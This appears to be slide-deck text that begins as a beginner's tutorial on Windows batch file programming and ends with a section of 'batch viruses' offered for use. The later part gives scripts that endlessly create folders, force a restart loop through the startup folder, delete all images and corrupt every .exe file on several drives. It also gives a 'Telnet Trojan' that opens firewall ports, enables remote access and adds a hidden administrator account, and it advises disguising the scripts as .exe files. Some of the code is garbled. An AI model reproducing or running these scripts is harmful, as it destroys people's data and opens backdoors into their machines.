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• Batch file programming is nothing but the Windows version of Unix Shell Programming.

Or Batch file programming is the native programming offered by the Microsoft Windows Operating System.

• Batch file is created using any text editors like notepad, WordPad, WinWord or so on, which comprises of a sequence of built-in commands used to perform some often done tasks like deleting a series of files of same type or of different type, creating logs, clearing unwanted craps from your computer and even for creating a batch VIRUS.

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Modes that are supported by DOS

Interactive Mode• In interactive mode, when a command is

executed, it interacts with the user for input and depending upon the input supplied by the user, the further processes are carried out.

• For example, let’s take the ‘del’ command.

C:\>del a

C:\a\*, Are you sure (Y/N)? y

Batch Mode (Silent Mode)• Batch mode can also be referred as ‘‘Quiet

Mode’, and this is opposite to the interactive

mode. The command that operates at batch

mode will never interact with the user at any

instance, instead it will take care of every

operation by itself.

• For example, using the same ‘del’ command &

switch ‘/Q’ (Quite mode).

C:\>del /Q a


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Types of commands that we can run from a command prompt

Internal Commands

• Internal commands are nothing but the built-in commands that are shipped along with the operating system.

• For example, echo, cls, del, dir were few of the well known internal commands.

External Commands• External commands are the commands that

are often created while installing a new application and these commands mostly have no use except calling that application and support files.

• Few external commands can only be executed in the ‘Run’ dialog box, but not on the command prompt. E.g firefox


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Why BATCH???

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So why do I need Batch File Programs?

• Say you need to execute a set of commands over and over again to perform a

routine task like Backing up Important Files, Deleting temporary files(*.tmp,

.bak , ~.* etc) then it is very difficult to type the same set of commands over

and over again.

• To perform a bulk set of same commands over and over again, Batch files

are used. Batch Files are to DOS what Macros are to Microsoft Office and

are used to perform an automated predefined set of tasks over and over


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Lets take an example……

.BAT File

ECHO This Batch File deletes all unwanted Temporary files from your system

ECHO Now we go to the Windows\temp directory.

cd windows\temp

ECHO Deleting unwanted temporary files....

del *.tmp

ECHO Your System is Now Clean

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Now let's see what happens when we execute the above snippet of batch



C:\WINDOWS>ECHO This Batch File deletes all unwanted Temporary

files from your


C:\WINDOWS>ECHO Now we go to the Windows\temp directory.

Now we go to the Windows\temp directory.

C:\WINDOWS>cd windows\temp

Invalid directory

C:\WINDOWS>ECHO Deleting unwanted temporary files

Deleting unwanted temporary files...

C:\WINDOWS>del *.tmp

C:\WINDOWS>ECHO Your System is Now Clean

Your System is Now Clean


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How to create a Batch Program ?

Like any other programing languages, lets start our first program with the ‘Hello World’


1. Open up a notepad and type the following.

@echo offEcho Hello Worldpause

2. Save the file with any name you wish, but make sure that you save the file extension

with .bat, like ‘first.bat’.

3. Just double click to execute the batch file that you have created now.

4. And you are done!

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Basic Commands 𝑦𝑜𝑢 𝑠ℎ𝑜𝑢𝑙𝑑 𝑘𝑛𝑜𝑤

• Echo

• Pause

• Dir

• Rem

• Cd

• Mkdir

• Del

• Start

• Exit

• If

• For

• Goto

• Cls

• Call

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Passing Parameters(%0 - %9)

• To understand how parameters

work, look at the following script:


ECHO First Parameter is %1

ECHO Second Parameter is %2

ECHO Third Parameter is %3

• This batch file produces the

following result:

• C:\windows>batch_file_name abc def ghi

First Parameter is abc

Second Parameter is def

Third Parameter is ghi

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SHIFT command

• look at the following snippet of code:


ECHO The first Parameter is %1



ECHO The Second Parameter is %1



ECHO The Second Parameter is %1

• Now execute this batch file from DOS and see what happens:

• C:\windows>batch_file_name abc def ghi

The first Parameter is abc

The Second Parameter is def

The Second Parameter is ghi

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.BAT File:



CD %1

DEL %2

In Command Prompt:

C:\windows>batch_file_name windows\temp *.tmp

Disk Clean-up Utility

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The FOR Loop

• The syntax of the FOR LOOP is:

FOR %%PARAMETER IN(set) DO command

• Ex:



FOR %%A IN (abc, def, xyz) DO ECHO %%A

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Let’s take another example…..




ECHO I am going to delete the following files:

ECHO %1 %2


ECHO Press Ctrl+C to Abort process


FOR %%a IN (%1 %2 ) DO DEL %%a

ECHO Killed Files. Mission Accomplished.

• At execution time, the process would be

something like:

C:\WINDOWS>batchfilename *.tmp *.bak

I am going to delete the following files:

*.tmp *.bak

Press Ctrl+C to Abort process

Press any key to continue . . .

Killed Files. Mission Accomplished.

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• @echo off

IF EXIST C:\akshay.doc GOTO


GOTO end




IF EXIST c:\autoexec.bat IF EXIST

c:\autoexec.bak ECHO Both Exist



c:\somedir\somefile.dat ECHO

File c:\somedir\somefile.dat does not


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NULL device

• The NULL device is basically nothing, it actually stands for simply


• Each directory has the NULL device present in it. (At least DOS

thinks so.)

• So to check if c:\windows exits, simply type:

IF EXIST c:\windows\nul ECHO c:\Windows exists.

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Redirection Operators

<> ~

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Redirection Operators

‘>’Output Redirection Operator

• To send the Output to somewhere other than the screen we use the Output Redirection Operator, > which is most commonly used to capture results of a command in a text file.

• Example:

c:\windows>dir *.* > abc.txt

‘<‘ Input Redirection Operator • It is most commonly used to send the

contents of a text file to DOS. The other common usage of this feature is the MORE command which displays a file one screen at a time unlike the TYPE command which on execution displays the entire file.

• Example:

c:\windows>more < xyz.txt

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Piping| |

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• Piping is a feature which combines both Input and Output Redirection. It uses the Pipe operator, which is the| symbol. This command captures the Output of one command and sends it as the Input of the other command.

• Say for example, when you give the command del *.* then you need to confirm that you mean to delete all files by pressing y. Instead we can simply do the same without any User Interaction by giving the command:

c:\windows> echo y | del *.*

• This command is pretty self explanatory, y is sent to the command del *.*

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Batch Viruses

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Many Folders

This code creates 1000’s of folders with number naming.




md %random%

goto e


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Undeletable Folder with Your Name


md c:\documents and settings\users\desktop\akshay

md c:\akshay

md d:\akshay

md e:\akshay

md f:\akshay

md g:\akshay

md h:\akshay

goto y

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System Restart Virus

This batch file code is restarts system when it starts



echo shutdown –r –f –t 00 > shut.bat

move shut.bat C:\"Documents and Settings"\"All Users"\"Start Menu"\Programs\Startup


Copy the above code and paste in notepad by name anything.bat and runs on any

Pc then after next restart the system will never starts and automatically restarts.

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For Loop Viruses

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For loop viruses 1

This code creates messages on desktop showing files are corrupted.



For /r c:\ %%y in (*.*) do msg * %%y ------ is Corrupted.

it not actually corrupts the file it shows only messages


Note: conversion into exe is required.

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For loop viruses 2 (Damage level :High)

1. This code will remove all images, wallpapers from your system.

Warning! -- Try it on your own risk.


for /r c:\ %%y in (*.jpg,*.png,*.gif,*.ico) do del %%y /s/q

for /r d:\ %%y in (*.jpg,*.png,*.gif,*.ico) do del %%y /s/q

for /r e:\ %%y in (*.jpg,*.png,*.gif,*.ico) do del %%y /s/q

for /r f:\ %%y in (*.jpg,*.png,*.gif,*.ico) do del %%y /s/q

Note: conversion into exe is required.

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For loop viruses 3 (Damage level :High)

This code will corrupt all exe files of your system.

Warning! -- Try it on your own risk.


echo you lost all !!!! >c:\tempero.null

for /r c:\ %%y in (*.exe) do copy c:\temporal.null + %%y %%y

for /r d:\ %%y in (*.exe) do copy c:\temporal.null + %%y %%y

for /r e:\ %%y in (*.exe) do copy c:\temporal.null + %%y %%y

for /r f:\ %%y in (*.exe) do copy c:\temporal.null + %%y %%y

del c:\tempero.null /s/q

Note: conversion into exe is required.

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Telnet Trojan

Work as Remote Administrator tool with the use of telnet.

@echo off

sc config tlntsvr start= auto

net start tlntsvr

netsh firewall add portopening TCP 23 "Telnet"

sc config termservice start= auto

net start termservice

netsh firewall add portopening TCP 3389 "Remote Desktop"

net user Default 12345 /add

net localgroup administrators Default /add

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Making Viruses Smart

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• Firstly copy all these coding into the notepad and name them anything with .bat extention.

• Now converts this .bat file into .exe file with the help of Bat to Exe converter.

• This is the software which

helps us to hide the cmd

coding and runs the process

in background.


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Finishing Virus

CodingMixing process.



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Thank You!!!

Keep Coding….

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